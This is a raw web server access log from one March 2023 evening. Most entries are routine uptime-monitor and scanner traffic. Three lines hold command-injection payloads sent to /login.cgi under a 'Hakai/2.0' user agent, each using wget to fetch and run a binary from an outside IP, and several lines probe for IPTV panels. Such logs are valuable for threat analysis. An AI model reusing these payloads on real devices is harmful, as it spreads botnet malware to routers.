212.91.246.72 - - [01/Mar/2023:20:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [01/Mar/2023:20:53:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Mar/2023:20:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:20:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:01:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:02:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:03:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:04:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:06:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:14:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:16:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:17:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:18:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.187.205.166 - - [01/Mar/2023:21:19:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Mar/2023:21:19:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.223.209 - - [01/Mar/2023:21:20:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Mar/2023:21:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:21:23:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:21:23:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:24:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.200.92.174 - - [01/Mar/2023:21:25:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:21:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:21:25:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:21:26:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.148.11.222 - - [01/Mar/2023:21:33:32 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Mar/2023:21:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.211.162.45 - - [01/Mar/2023:21:57:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Mar/2023:21:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:21:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [01/Mar/2023:22:00:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [01/Mar/2023:22:00:19 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:22:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:01:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:02:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:03:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:04:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:06:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.252.81.172 - - [01/Mar/2023:22:14:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:22:14:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.119 - - [01/Mar/2023:22:14:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.119 - - [01/Mar/2023:22:14:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [01/Mar/2023:22:14:39 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.119 - - [01/Mar/2023:22:14:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Mar/2023:22:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:16:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:17:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:18:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:19:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:22:21:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:22:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.211.162.45 - - [01/Mar/2023:22:21:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Mar/2023:22:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [01/Mar/2023:22:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [01/Mar/2023:22:22:54 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:22:23:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:24:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [01/Mar/2023:22:25:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [01/Mar/2023:22:25:16 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:22:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:26:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:22:29:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:22:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [01/Mar/2023:22:34:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [01/Mar/2023:22:34:10 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [01/Mar/2023:22:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.164.14 - - [01/Mar/2023:22:34:40 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
137.184.164.14 - - [01/Mar/2023:22:34:40 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
137.184.164.14 - - [01/Mar/2023:22:34:40 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
137.184.164.14 - - [01/Mar/2023:22:34:41 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
137.184.164.14 - - [01/Mar/2023:22:34:41 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
137.184.164.14 - - [01/Mar/2023:22:34:42 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
137.184.164.14 - - [01/Mar/2023:22:34:42 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
137.184.164.14 - - [01/Mar/2023:22:34:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
79.110.62.172 - - [01/Mar/2023:22:35:23 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; Dillo 3.0)"
212.91.246.72 - - [01/Mar/2023:22:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.182.152.10 - - [01/Mar/2023:22:36:13 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
147.182.152.10 - - [01/Mar/2023:22:36:14 +0100] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.152.10 - - [01/Mar/2023:22:36:14 +0100] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.152.10 - - [01/Mar/2023:22:36:15 +0100] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.152.10 - - [01/Mar/2023:22:36:15 +0100] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.152.10 - - [01/Mar/2023:22:36:15 +0100] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
147.182.152.10 - - [01/Mar/2023:22:36:16 +0100] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.152.10 - - [01/Mar/2023:22:36:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
212.91.246.72 - - [01/Mar/2023:22:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:22:36:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Mar/2023:22:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2023:22:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [01/Mar/2023:22:43:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
